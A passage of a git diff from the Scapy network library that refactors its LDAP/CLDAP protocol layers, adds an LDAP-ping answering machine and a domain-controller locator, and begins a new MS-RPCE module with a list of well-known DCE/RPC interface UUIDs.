LDAPDN("matchedDN", ""), LDAPString("diagnosticMessage", ""), # LDAP v3 only - ASN1F_optional( - ASN1F_SEQUENCE_OF("referral", [], LDAPReferral, - implicit_tag=0xa3) - ) + ASN1F_optional(ASN1F_SEQUENCE_OF("referral", [], LDAPReferral, implicit_tag=0xA3)), ) +# ldap APPLICATION + + +class ASN1_Class_LDAP(ASN1_Class_UNIVERSAL): + name = "LDAP" + APPLICATION = 0x60 + + +class ASN1_LDAP_APPLICATION(ASN1_SEQUENCE): + tag = ASN1_Class_LDAP.APPLICATION + + +class BERcodec_LDAP_APPLICATION(BERcodec_SEQUENCE): + tag = ASN1_Class_LDAP.APPLICATION + + +class ASN1F_LDAP_APPLICATION(ASN1F_SEQUENCE): + ASN1_tag = ASN1_Class_LDAP.APPLICATION + + # Bind operation # https://datatracker.ietf.org/doc/html/rfc1777#section-4.1 class ASN1_Class_LDAP_Authentication(ASN1_Class_UNIVERSAL): name = "LDAP Authentication" - simple = 0xa0 - krbv42LDAP = 0xa1 - krbv42DSA = 0xa2 - sasl = 0xa3 + simple = 0xA0 + krbv42LDAP = 0xA1 + krbv42DSA = 0xA2 + sasl = 0xA3 class ASN1_LDAP_Authentication_simple(ASN1_STRING): @@ -152,40 +195,58 @@ class ASN1F_LDAP_Authentication_krbv42DSA(ASN1F_STRING): ASN1_tag = ASN1_Class_LDAP_Authentication.krbv42DSA +_SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB} + + +class _SaslCredentialsField(_ASN1FString_PacketField): + def m2i(self, pkt, s): + val = super(_SaslCredentialsField, self).m2i(pkt, s) + if not val[0].val: + return val + if pkt.mechanism.val in _SASL_MECHANISMS: + return ( + _SASL_MECHANISMS[pkt.mechanism.val](val[0].val, _underlayer=pkt), + val[1], + ) + return val + + class LDAP_SaslCredentials(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( - LDAPString("mechanism", ""), - ASN1F_STRING("credentials", "") + LDAPString("mechanism", ""), _SaslCredentialsField("credentials", "") ) class LDAP_BindRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( + ASN1_root = ASN1F_LDAP_APPLICATION( ASN1F_INTEGER("version", 2), LDAPDN("bind_name", ""), - ASN1F_CHOICE("authentication", None, - ASN1F_LDAP_Authentication_simple, - ASN1F_LDAP_Authentication_krbv42LDAP, - ASN1F_LDAP_Authentication_krbv42DSA, - ASN1F_PACKET( - "sasl", - LDAP_SaslCredentials(), - LDAP_SaslCredentials, - implicit_tag=0xa3), - ) + ASN1F_CHOICE( + "authentication", + None, + ASN1F_LDAP_Authentication_simple, + ASN1F_LDAP_Authentication_krbv42LDAP, + ASN1F_LDAP_Authentication_krbv42DSA, + ASN1F_PACKET( + "sasl", LDAP_SaslCredentials(), LDAP_SaslCredentials, implicit_tag=0xA3 + ), + ), + implicit_tag=0, ) class LDAP_BindResponse(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( - *(LDAPResult.seq + ( - ASN1F_optional( - ASN1F_STRING("serverSaslCreds", "", - implicit_tag=0x87) - ),))) + ASN1_root = ASN1F_LDAP_APPLICATION( + *( + LDAPResult + + (ASN1F_optional(ASN1F_STRING("serverSaslCreds", "", implicit_tag=0x87)),) + ), + implicit_tag=1, + ) + # Unbind operation # https://datatracker.ietf.org/doc/html/rfc1777#section-4.2 @@ -218,19 +279,23 @@ class LDAP_SubstringFilterFinal(ASN1_Packet): class LDAP_SubstringFilterStr(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_CHOICE( - "str", ASN1_STRING(""), - ASN1F_PACKET("initial", - LDAP_SubstringFilterInitial(), - LDAP_SubstringFilterInitial, - implicit_tag=0x0), - ASN1F_PACKET("any", - LDAP_SubstringFilterAny(), - LDAP_SubstringFilterAny, - implicit_tag=0x1), - ASN1F_PACKET("final", - LDAP_SubstringFilterFinal(), - LDAP_SubstringFilterFinal, - implicit_tag=0x2), + "str", + ASN1_STRING(""), + ASN1F_PACKET( + "initial", + LDAP_SubstringFilterInitial(), + LDAP_SubstringFilterInitial, + implicit_tag=0x0, + ), + ASN1F_PACKET( + "any", LDAP_SubstringFilterAny(), LDAP_SubstringFilterAny, implicit_tag=0x1 + ), + ASN1F_PACKET( + "final", + LDAP_SubstringFilterFinal(), + LDAP_SubstringFilterFinal, + implicit_tag=0x2, + ), ) @@ -238,7 +303,7 @@ class LDAP_SubstringFilter(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( AttributeType("type", ""), - ASN1F_SEQUENCE_OF("filters", [], LDAP_SubstringFilterStr) + ASN1F_SEQUENCE_OF("filters", [], LDAP_SubstringFilterStr), ) @@ -260,38 +325,47 @@ class LDAP_FilterPresent(ASN1_Packet): ASN1_root = AttributeType("present", "") +class LDAP_FilterEqual(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValueAssertion.ASN1_root + + +class LDAP_FilterGreaterOrEqual(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValueAssertion.ASN1_root + + +class LDAP_FilterLesserOrEqual(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValueAssertion.ASN1_root + + +class LDAP_FilterLessOrEqual(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValueAssertion.ASN1_root + + +class LDAP_FilterApproxMatch(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = AttributeValueAssertion.ASN1_root + + class LDAP_Filter(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_CHOICE( - "filter", LDAP_FilterPresent(), - ASN1F_PACKET("and_", None, LDAP_FilterAnd, - implicit_tag=0x80), - ASN1F_PACKET("or_", None, LDAP_FilterOr, - implicit_tag=0x81), - ASN1F_PACKET("not_", None, - _LDAP_Filter, - implicit_tag=0x82), - ASN1F_PACKET("equalityMatch", - AttributeValueAssertion(), - AttributeValueAssertion, - implicit_tag=0x83), - ASN1F_PACKET("substrings", - LDAP_SubstringFilter(), - LDAP_SubstringFilter, - implicit_tag=0x84), - ASN1F_PACKET("greaterOrEqual", - AttributeValueAssertion(), - AttributeValueAssertion, - implicit_tag=0x85), - ASN1F_PACKET("lessOrEqual", - AttributeValueAssertion(), - AttributeValueAssertion, - implicit_tag=0x86), - ASN1F_PACKET("present", LDAP_FilterPresent(), - LDAP_FilterPresent, - implicit_tag=0x87), - ASN1F_PACKET("approxMatch", None, AttributeValueAssertion, - implicit_tag=0x88), + "filter", + LDAP_FilterPresent(), + ASN1F_PACKET("and_", None, LDAP_FilterAnd, implicit_tag=0xA0), + ASN1F_PACKET("or_", None, LDAP_FilterOr, implicit_tag=0xA1), + ASN1F_PACKET("not_", None, _LDAP_Filter, implicit_tag=0xA2), + ASN1F_PACKET("equalityMatch", None, LDAP_FilterEqual, implicit_tag=0xA3), + ASN1F_PACKET("substrings", None, LDAP_SubstringFilter, implicit_tag=0xA4), + ASN1F_PACKET( + "greaterOrEqual", None, LDAP_FilterGreaterOrEqual, implicit_tag=0xA5 + ), + ASN1F_PACKET("lessOrEqual", None, LDAP_FilterLessOrEqual, implicit_tag=0xA6), + ASN1F_PACKET("present", None, LDAP_FilterPresent, implicit_tag=0xA7), + ASN1F_PACKET("approxMatch", None, LDAP_FilterApproxMatch, implicit_tag=0xA8), ) @@ -302,22 +376,27 @@ class LDAP_SearchRequestAttribute(ASN1_Packet): class LDAP_SearchRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( + ASN1_root = ASN1F_LDAP_APPLICATION( LDAPDN("baseObject", ""), - ASN1F_ENUMERATED("scope", 0, {0: "baseObject", - 1: "singleLevel", - 2: "wholeSubtree"}), - ASN1F_ENUMERATED("derefAliases", 0, {0: "neverDerefAliases", - 1: "derefInSearching", - 2: "derefFindingBaseObj", - 3: "derefAlways"}), + ASN1F_ENUMERATED( + "scope", 0, {0: "baseObject", 1: "singleLevel", 2: "wholeSubtree"} + ), + ASN1F_ENUMERATED( + "derefAliases", + 0, + { + 0: "neverDerefAliases", + 1: "derefInSearching", + 2: "derefFindingBaseObj", + 3: "derefAlways", + }, + ), ASN1F_INTEGER("sizeLimit", 0), ASN1F_INTEGER("timeLimit", 0), ASN1F_BOOLEAN("attrsOnly", False), - ASN1F_PACKET("filter", LDAP_Filter(), - LDAP_Filter), - ASN1F_SEQUENCE_OF("attributes", [], - LDAP_SearchRequestAttribute) + ASN1F_PACKET("filter", LDAP_Filter(), LDAP_Filter), + ASN1F_SEQUENCE_OF("attributes", [], LDAP_SearchRequestAttribute), + implicit_tag=3, ) @@ -330,29 +409,37 @@ class LDAP_SearchResponseEntryAttribute(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( AttributeType("type", ""), - ASN1F_SET_OF("values", [], - LDAP_SearchResponseEntryAttributeValue) + ASN1F_SET_OF("values", [], LDAP_SearchResponseEntryAttributeValue), ) class LDAP_SearchResponseEntry(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_SEQUENCE( + ASN1_root = ASN1F_LDAP_APPLICATION( LDAPDN("objectName", ""), - ASN1F_SEQUENCE_OF("attributes", - LDAP_SearchResponseEntryAttribute(), - LDAP_SearchResponseEntryAttribute) + ASN1F_SEQUENCE_OF( + "attributes", + LDAP_SearchResponseEntryAttribute(), + LDAP_SearchResponseEntryAttribute, + ), + implicit_tag=4, ) -class LDAP_SearchResponseResultCode(ASN1_Packet): +class LDAP_SearchResponseResultDone(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = LDAPResult + ASN1_root = ASN1F_LDAP_APPLICATION( + *LDAPResult, + implicit_tag=5, + ) class LDAP_AbandonRequest(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = ASN1F_INTEGER("messageID", 0) + ASN1_root = ASN1F_LDAP_APPLICATION( + ASN1F_INTEGER("messageID", 0), + implicit_tag=0x10, + ) # LDAP v3 @@ -365,9 +452,7 @@ class LDAP_Control(ASN1_Packet): ASN1F_optional( ASN1F_BOOLEAN("criticality", False), ), - ASN1F_optional( - ASN1F_STRING("controlValue", "") - ), + ASN1F_optional(ASN1F_STRING("controlValue", "")), ) @@ -378,45 +463,41 @@ class LDAP(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER ASN1_root = ASN1F_SEQUENCE( ASN1F_INTEGER("messageID", 0), - ASN1F_CHOICE("protocolOp", LDAP_SearchRequest(), - ASN1F_PACKET("bindRequest", - LDAP_BindRequest(), - LDAP_BindRequest, - implicit_tag=0x60), - ASN1F_PACKET("bindResponse", - LDAP_BindResponse(), - LDAP_BindResponse, - implicit_tag=0x61), - ASN1F_PACKET("unbindRequest", - LDAP_UnbindRequest(), - LDAP_UnbindRequest, - implicit_tag=0x42), - ASN1F_PACKET("searchRequest", - LDAP_SearchRequest(), - LDAP_SearchRequest, - implicit_tag=0x63), - ASN1F_PACKET("searchResponse", - LDAP_SearchResponseEntry(), - LDAP_SearchResponseEntry, - implicit_tag=0x64), - ASN1F_PACKET("searchResponse", - LDAP_SearchResponseResultCode(), - LDAP_SearchResponseResultCode, - implicit_tag=0x65), - ASN1F_PACKET("abandonRequest", - LDAP_AbandonRequest(), - LDAP_AbandonRequest, - implicit_tag=0x70) - ), + ASN1F_CHOICE( + "protocolOp", + LDAP_SearchRequest(), + LDAP_BindRequest, + LDAP_BindResponse, + LDAP_SearchRequest, + LDAP_SearchResponseEntry, + LDAP_SearchResponseResultDone, + LDAP_AbandonRequest, + # For some reason the unbind request is under the 0x40 + ASN1F_PACKET( + "unbindRequest", + LDAP_UnbindRequest(), + LDAP_UnbindRequest, + implicit_tag=0x42, + ), + ), # LDAP v3 only ASN1F_optional( - ASN1F_SEQUENCE_OF("Controls", [], LDAP_Control, - implicit_tag=0x0) - ) + ASN1F_SEQUENCE_OF("Controls", None, LDAP_Control, implicit_tag=0xA0) + ), ) + def answers(self, other): + return isinstance(other, LDAP) and other.messageID == self.messageID + def mysummary(self): - return (self.protocolOp.__class__.__name__.replace("_", " "), [LDAP]) + return ( + "%s(%s)" + % ( + self.protocolOp.__class__.__name__.replace("_", " "), + self.messageID.val, + ), + [LDAP], + ) bind_layers(LDAP, LDAP) @@ -437,9 +518,12 @@ class CLDAP(ASN1_Packet): ASN1F_optional( LDAPDN("user", ""), ), - LDAP.ASN1_root.seq[1] # protocolOp + LDAP.ASN1_root.seq[1], # protocolOp ) + def answers(self, other): + return isinstance(other, CLDAP) and other.messageID == self.messageID + bind_layers(CLDAP, CLDAP) @@ -448,86 +532,271 @@ class CLDAP(ASN1_Packet): bind_layers(UDP, CLDAP, sport=389, dport=389) -# NTLM Automata - - -class NTLM_LDAP_Client(NTLM_Client, Automaton): - port = 389 - cls = LDAP - - def __init__(self, *args, **kwargs): - self.messageID = 1 - self.authenticated = False - super(NTLM_LDAP_Client, self).__init__(*args, **kwargs) - - @ATMT.state(initial=1) - def BEGIN(self): - self.wait_server() - - @ATMT.condition(BEGIN) - def begin(self): - raise self.WAIT_FOR_TOKEN() +# Small CLDAP Answering machine: [MS-ADTS] 6.3.3 - Ldap ping + + +class LdapPing_am(AnsweringMachine): + function_name = "ldappingd" + filter = "udp port 389" + + def parse_options( + self, + NetbiosDomainName="DOMAIN", + DomainGuid=uuid.UUID("192bc4b3-0085-4521-83fe-062913ef59f2"), + DcSiteName="Default-First-Site-Name", + NetbiosComputerName="SRV1", + DnsForestName=None, + DnsHostName=None, + src_ip=None, + src_ip6=None, + ): + self.NetbiosDomainName = NetbiosDomainName + self.DnsForestName = DnsForestName or (NetbiosDomainName + ".LOCAL") + self.DomainGuid = DomainGuid + self.DcSiteName = DcSiteName + self.NetbiosComputerName = NetbiosComputerName + self.DnsHostName = DnsHostName or ( + NetbiosComputerName + "." + self.DnsForestName + ) + self.src_ip = src_ip + self.src_ip6 = src_ip6 + + def is_request(self, req): + # [MS-ADTS] 6.3.3 - Example: + # (&(DnsDomain=abcde.corp.microsoft.com)(Host=abcdefgh-dev)(User=abcdefgh- + # dev$)(AAC=\80\00\00\00)(DomainGuid=\3b\b0\21\ca\d3\6d\d1\11\8a\7d\b8\df\b1\56\87\1f)(NtVer + # =\06\00\00\00)) + if CLDAP not in req or not isinstance(req.protocolOp, LDAP_SearchRequest): + return False + req = req.protocolOp + return ( + req.attributes + and req.attributes[0].type.val == b"Netlogon" + and req.filter + and isinstance(req.filter.filter, LDAP_FilterAnd) + and any( + x.filter.attributeType.val == b"NtVer" for x in req.filter.filter.and_ + ) + ) - @ATMT.state() - def WAIT_FOR_TOKEN(self): - pass + def make_reply(self, req): + if IPv6 in req: + resp = IPv6(dst=req[IPv6].src, src=self.src_ip6) + else: + resp = IP(dst=req[IP].src, src=self.src_ip) + resp /= UDP(sport=req.dport, dport=req.sport) + # get the DnsDomainName from the request + try: + DnsDomainName = next( + x.filter.attributeValue.val + for x in req.protocolOp.filter.filter.and_ + if x.filter.attributeType.val == b"DnsDomain" + ) + except StopIteration: + return + return ( + resp + / CLDAP( + protocolOp=LDAP_SearchResponseEntry( + attributes=[ + LDAP_SearchResponseEntryAttribute( + values=[ + LDAP_SearchResponseEntryAttributeValue( + value=ASN1_STRING( + val=bytes( + NETLOGON_SAM_LOGON_RESPONSE_EX( + # Mandatory fields + DnsDomainName=DnsDomainName, + NtVersion=5, + LmNtToken=65535, + Lm20Token=65535, + # Below can be customized + Flags=0x3F3FD, + DomainGuid=self.DomainGuid, + DnsForestName=self.DnsForestName, + DnsHostName=self.DnsHostName, + NetbiosDomainName=self.NetbiosDomainName, # noqa: E501 + NetbiosComputerName=self.NetbiosComputerName, # noqa: E501 + UserName=b".", + DcSiteName=self.DcSiteName, + ClientSiteName=self.DcSiteName, + ) + ) + ) + ) + ], + type=ASN1_STRING(b"Netlogon"), + ) + ], + ), + messageID=req.messageID, + user=None, + ) + / CLDAP( + protocolOp=LDAP_SearchResponseResultDone( + referral=None, + resultCode=0, + ), + messageID=req.messageID, + user=None, + ) + ) - @ATMT.condition(WAIT_FOR_TOKEN) - def should_send_bind(self): - ntlm_tuple = self.get_token() - raise self.SENT_BIND().action_parameters(ntlm_tuple) - @ATMT.action(should_send_bind) - def send_bind(self, ntlm_tuple): - ntlm_token, _, _ = ntlm_tuple - pkt = LDAP( - messageID=self.messageID, - protocolOp=LDAP_BindRequest( - version=2, - authentication=LDAP_SaslCredentials( - mechanism="GSS-SPNEGO", - credentials=ntlm_token - ) +_located_dc = collections.namedtuple("LocatedDC", ["ip", "samlogon"]) +_dclocatorcache = conf.netcache.new_cache("dclocator", 600) + + +@conf.commands.register +def dclocator(realm, qtype="A", mode="ldap", port=None, timeout=1, debug=0): + """ + Perform a DC Locator as per [MS-ADTS] sect 6.3.6 or RFC4120. + + :param realm: the kerberos realm to locate + :param mode: Detect if a server is up and joinable thanks to one of: + + - 'nocheck': Do not check that servers are online. + - 'ldap': Use the LDAP ping (CLDAP) per [MS-ADTS]. Default. + This will however not work with MIT Kerberos servers. + - 'connect': connect to specified port to test the connection. + + :param mode: in connect mode, the port to connect to. (e.g. 88) + :param debug: print debug logs + + This is cached in conf.netcache.dclocator. + """ + # Check cache + cache_ident = ";".join([realm, qtype, mode]).lower() + if cache_ident in _dclocatorcache: + return _dclocatorcache[cache_ident] + # Perform DNS-Based discovery (6.3.6.1) + # 1. SRV records + qname = "_kerberos._tcp.dc._msdcs.%s" % realm.lower() + if debug: + log_runtime.info("DC Locator: requesting SRV for '%s' ..." % qname) + try: + hosts = [ + x.target + for x in dns_resolve( + qname=qname, + qtype="SRV", + timeout=timeout, ) + ] + except TimeoutError: + raise TimeoutError("Resolution of %s timed out" % qname) + if not hosts: + raise ValueError("No DNS record found for %s" % qname) + elif debug: + log_runtime.info( + "DC Locator: got %s. Resolving %s records ..." % (hosts, qtype) ) - self.send(pkt) - self.messageID += 1 - - @ATMT.state() - def SENT_BIND(self): - pass - - @ATMT.receive_condition(SENT_BIND) - def receive_bind_response(self, pkt): - if isinstance(pkt.protocolOp, LDAP_BindResponse): - if pkt.protocolOp.resultCode == 0x31: # Invalid credentials - ntlm_tuple = (None, None, None) - elif pkt.protocolOp.resultCode == 0x0: # Auth success - ntlm_tuple = (None, 0, None) - self.authenticated = True - elif pkt.protocolOp.resultCode == 0x35: # UnwillingToPerform - print("Error:") - pkt.show() - raise self.ERRORED() - else: - ntlm_tuple = self._get_token( - pkt.protocolOp.serverSaslCreds.val + # 2. A records + ips = [] + for host in hosts: + arec = dns_resolve( + qname=host, + qtype=qtype, + timeout=timeout, + ) + if arec: + ips.extend(x.rdata for x in arec) + if not ips: + raise ValueError("Could not get any %s records for %s" % (qtype, hosts)) + elif debug: + log_runtime.info("DC Locator: got %s . Mode: %s" % (ips, mode)) + # Pick first online host. We have three options + if mode == "nocheck": + # Don't check anything. Not recommended + return _located_dc(ips[0], None) + elif mode == "connect": + assert port is not None, "Must provide a port in connect mode !" + # Compatibility with MIT Kerberos servers + for ip in ips: # TODO: "addresses in weighted random order [RFC2782]" + if debug: + log_runtime.info("DC Locator: connecting to %s on %s ..." % (ip, port)) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.settimeout(timeout) + sock.connect((ip, port)) + # Success + result = _located_dc(ip, None) + # Cache + _dclocatorcache[cache_ident] = result + return result + except OSError: + # Host timed out, No route to host, etc. + if debug: + log_runtime.info("DC Locator: %s timed out." % ip) + continue + finally: + sock.close() + raise ValueError("No host was reachable on port %s among %s" % (port, ips)) + elif mode == "ldap": + # Real 'LDAP Ping' per [MS-ADTS] + for ip in ips: # TODO: "addresses in weighted random order [RFC2782]" + if debug: + log_runtime.info("DC Locator: LDAP Ping %s on ..." % ip) + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + sock.settimeout(timeout) + sock.connect((ip, 389)) + sock = SimpleSocket(sock, CLDAP) + pkt = sock.sr1( + CLDAP( + protocolOp=LDAP_SearchRequest( + filter=LDAP_Filter( + filter=LDAP_FilterAnd( + and_=[ + LDAP_Filter( + filter=LDAP_FilterEqual( + attributeType=ASN1_STRING(b"DnsDomain"), + attributeValue=ASN1_STRING(realm), + ) + ), + LDAP_Filter( + filter=LDAP_FilterEqual( + attributeType=ASN1_STRING(b"NtVer"), + attributeValue=ASN1_STRING( + b"\x16\x00\x00!" + ), + ) + ), + ] + ) + ), + attributes=[ + LDAP_SearchRequestAttribute( + type=ASN1_STRING(b"Netlogon") + ) + ], + ), + user=None, + ), + timeout=timeout, + verbose=0, ) - self.received_ntlm_token(ntlm_tuple) - if self.authenticated: - raise self.AUTHENTICATED() - else: - raise self.WAIT_FOR_TOKEN() - - @ATMT.state(final=1) - def ERRORED(self): - pass - - @ATMT.state(final=1) - def AUTHENTICATED(self): - pass - - -class NTLM_LDAPS_Client(NTLM_LDAP_Client): - port = 636 - ssl = True + if pkt: + # Check if we have a search response + response = None + if isinstance(pkt.protocolOp, LDAP_SearchResponseEntry): + try: + response = next( + NETLOGON_SAM_LOGON_RESPONSE_EX(x.values[0].value.val) + for x in pkt.protocolOp.attributes + if x.type.val == b"Netlogon" + ) + except StopIteration: + pass + result = _located_dc(ip, response) + # Cache + _dclocatorcache[cache_ident] = result + return result + except OSError: + # Host timed out, No route to host, etc. + if debug: + log_runtime.info("DC Locator: %s timed out." % ip) + continue + finally: + sock.close() + raise ValueError("No LDAP ping succeeded on any of %s. Try another mode?" % ips) diff --git a/scapy/layers/msrpce/__init__.py b/scapy/layers/msrpce/__init__.py new file mode 100644 index 00000000000..5bc7f21d2bf --- /dev/null +++ b/scapy/layers/msrpce/__init__.py @@ -0,0 +1,15 @@ +""" +[MS-RPCE] Remote Procedure Call Protocol Extensions + +This module contains toolery to interact with Microsoft's [MS-RPCE] +(DCE/RPC) extensions. + +It contains the following modules: + +- ``scapy.layers.msrpce.rpcclient``: a MS-RPCE client +- ``scapy.layers.msrpce.rpcserver``: a MS-RPCE server +- ``scapy.layers.msrpce.ept``: DCE/RPC 1.1 endpoint mapper +- ``scapy.layers.msrpce.mspac``: [MS-PAC], the PAC in Kerberos packets +- ``scapy.layers.msrpce.msnrpc``: [MS-NRPC], a client and SSP +- ``scapy.layers.msnpce.raw``: raw RPC classes +""" diff --git a/scapy/layers/msrpce/all.py b/scapy/layers/msrpce/all.py new file mode 100644 index 00000000000..a67eeb26439 --- /dev/null +++ b/scapy/layers/msrpce/all.py @@ -0,0 +1,506 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Philippe Biondi + +""" +All MSRPCE layers +""" + +import uuid + +from scapy.error import log_loading +from scapy.main import load_layer + +from scapy.layers.dcerpc import ( + DCE_RPC_INTERFACES_NAMES, + DCE_RPC_INTERFACES_NAMES_rev, +) + +__all__ = [] + + +# Load all layers bundled with Scapy +_LAYERS = [ + # High-level classes + "msrpce.msdcom", + "msrpce.msnrpc", + "msrpce.mspac", + # Client / Server + "msrpce.rpcclient", + "msrpce.rpcserver", + # Low-level RPC definitions + "msrpce.raw.ept", + "msrpce.raw.ms_dcom", + "msrpce.raw.ms_nrpc", + "msrpce.raw.ms_samr", + "msrpce.raw.ms_srvs", + "msrpce.raw.ms_wkst", +] + +for _l in _LAYERS: + log_loading.debug("Loading MSRPCE layer %s", _l) + try: + load_layer(_l, globals_dict=globals(), symb_list=__all__) + except Exception as e: + log_loading.warning("can't import layer %s: %s", _l, e) + + +# Populate DCE_RPC_INTERFACES_NAMES for some well-known interfaces + +# Well-Known = from MSDN +_DCE_RPC_WELL_KNOWN_UUIDS = [ + (uuid.UUID("00000000-0000-0000-c000-000000000046"), "IUnknown"), + (uuid.UUID("00000131-0000-0000-c000-000000000046"), "IRemUnknown"), + (uuid.UUID("00000143-0000-0000-c000-000000000046"), "IRemUnknown2"), + (uuid.UUID("000001a0-0000-0000-c000-000000000046"), "IRemoteSCMActivator"), + (uuid.UUID("00020400-0000-0000-c000-000000000046"), "IDispatch"), + (uuid.UUID("00020401-0000-0000-c000-000000000046"), "ITypeInfo"), + (uuid.UUID("00020402-0000-0000-c000-000000000046"), "ITypeLib"), + (uuid.UUID("00020403-0000-0000-c000-000000000046"), "ITypeComp"), + (uuid.UUID("00020404-0000-0000-c000-000000000046"), "IEnumVARIANT"), + (uuid.UUID("00020411-0000-0000-c000-000000000046"), "ITypeLib2"), + (uuid.UUID("00020412-0000-0000-c000-000000000046"), "ITypeInfo2"), + (uuid.UUID("004c6a2b-0c19-4c69-9f5c-a269b2560db9"), "IWindowsDriverUpdate4"), + (uuid.UUID("0191775e-bcff-445a-b4f4-3bdda54e2816"), "IAppHostPropertyCollection"), + (uuid.UUID("01954e6b-9254-4e6e-808c-c9e05d007696"), "IVssEnumMgmtObject"), + (uuid.UUID("027947e1-d731-11ce-a357-000000000001"), "IEnumWbemClassObject"), + (uuid.UUID("0316560b-5db4-4ed9-bbb5-213436ddc0d9"), "IVdsRemovable"), + ( + uuid.UUID("0344cdda-151e-4cbf-82da-66ae61e97754"), + "IAppHostElementSchemaCollection", + ), + (uuid.UUID("034634fd-ba3f-11d1-856a-00a0c944138c"), "IManageTelnetSessions"), + (uuid.UUID("038374ff-098b-11d8-9414-505054503030"), "IDataCollector"), + (uuid.UUID("03837502-098b-11d8-9414-505054503030"), "IDataCollectorCollection"), + ( + uuid.UUID("03837506-098b-11d8-9414-505054503030"), + "IPerformanceCounterDataCollector", + ), + (uuid.UUID("0383750b-098b-11d8-9414-505054503030"), "ITraceDataCollector"), + (uuid.UUID("03837510-098b-11d8-9414-505054503030"), "ITraceDataProviderCollection"), + (uuid.UUID("03837512-098b-11d8-9414-505054503030"), "ITraceDataProvider"), + (uuid.UUID("03837514-098b-11d8-9414-505054503030"), "IConfigurationDataCollector"), + (uuid.UUID("03837516-098b-11d8-9414-505054503030"), "IAlertDataCollector"), + (uuid.UUID("0383751a-098b-11d8-9414-505054503030"), "IApiTracingDataCollector"), + (uuid.UUID("03837520-098b-11d8-9414-505054503030"), "IDataCollectorSet"), + (uuid.UUID("03837524-098b-11d8-9414-505054503030"), "IDataCollectorSetCollection"), + (uuid.UUID("03837533-098b-11d8-9414-505054503030"), "IValueMapItem"), + (uuid.UUID("03837534-098b-11d8-9414-505054503030"), "IValueMap"), + (uuid.UUID("0383753a-098b-11d8-9414-505054503030"), "ISchedule"), + (uuid.UUID("0383753d-098b-11d8-9414-505054503030"), "IScheduleCollection"), + (uuid.UUID("03837541-098b-11d8-9414-505054503030"), "IDataManager"), + (uuid.UUID("03837543-098b-11d8-9414-505054503030"), "IFolderAction"), + (uuid.UUID("03837544-098b-11d8-9414-505054503030"), "IFolderActionCollection"), + (uuid.UUID("04c6895d-eaf2-4034-97f3-311de9be413a"), "IUpdateSearcher3"), + (uuid.UUID("070669eb-b52f-11d1-9270-00c04fbbbfb3"), "IDataFactory2"), + (uuid.UUID("0716caf8-7d05-4a46-8099-77594be91394"), "IAppHostConstantValue"), + (uuid.UUID("0770687e-9f36-4d6f-8778-599d188461c9"), "IFsrmFileManagementJob"), + (uuid.UUID("07e5c822-f00c-47a1-8fce-b244da56fd06"), "IVdsDisk"), + (uuid.UUID("07f7438c-7709-4ca5-b518-91279288134e"), "IUpdateCollection"), + (uuid.UUID("0818a8ef-9ba9-40d8-a6f9-e22833cc771e"), "IVdsService"), + (uuid.UUID("081e7188-c080-4ff3-9238-29f66d6cabfd"), "IMessenger"), + ( + uuid.UUID("08a90f5f-0702-48d6-b45f-02a9885a9768"), + "IAppHostChildElementCollection", + ), + (uuid.UUID("09829352-87c2-418d-8d79-4133969a489d"), "IAppHostChangeHandler"), + (uuid.UUID("0ac13689-3134-47c6-a17c-4669216801be"), "IVdsServiceHba"), + (uuid.UUID("0b1c2170-5732-4e0e-8cd3-d9b16f3b84d7"), "authzr"), + (uuid.UUID("0bb8531d-7e8d-424f-986c-a0b8f60a3e7b"), "IUpdateServiceManager2"), + ( + uuid.UUID("0d521700-a372-4bef-828b-3d00c10adebd"), + "IWindowsDriverUpdateEntryCollection", + ), + (uuid.UUID("0dd8a158-ebe6-4008-a1d9-b7ecc8f1104b"), "IAppHostSectionGroup"), + (uuid.UUID("0e3d6630-b46b-11d1-9d2d-006008b0e5ca"), "ICatalogTableRead"), + (uuid.UUID("0e3d6631-b46b-11d1-9d2d-006008b0e5ca"), "ICatalogTableWrite"), + (uuid.UUID("0eac4842-8763-11cf-a743-00aa00a3f00d"), "IDataFactory"), + (uuid.UUID("0fb15084-af41-11ce-bd2b-204c4f4f5020"), "ITransaction"), + (uuid.UUID("1088a980-eae5-11d0-8d9b-00a02453c337"), "qm2qm"), + (uuid.UUID("10c5e575-7984-4e81-a56b-431f5f92ae42"), "IVdsProvider"), + (uuid.UUID("112eda6b-95b3-476f-9d90-aee82c6b8181"), "IUpdate3"), + (uuid.UUID("118610b7-8d94-4030-b5b8-500889788e4e"), "IEnumVdsObject"), + (uuid.UUID("11899a43-2b68-4a76-92e3-a3d6ad8c26ce"), "TermSrvNotification"), + (uuid.UUID("11942d87-a1de-4e7f-83fb-a840d9c5928d"), "IClusterStorage3"), + (uuid.UUID("12345678-1234-abcd-ef00-0123456789ab"), "winspool"), + (uuid.UUID("12345678-1234-abcd-ef00-01234567cffb"), "logon"), + (uuid.UUID("12345778-1234-abcd-ef00-0123456789ab"), "lsarpc"), + (uuid.UUID("12345778-1234-abcd-ef00-0123456789ac"), "samr"), + 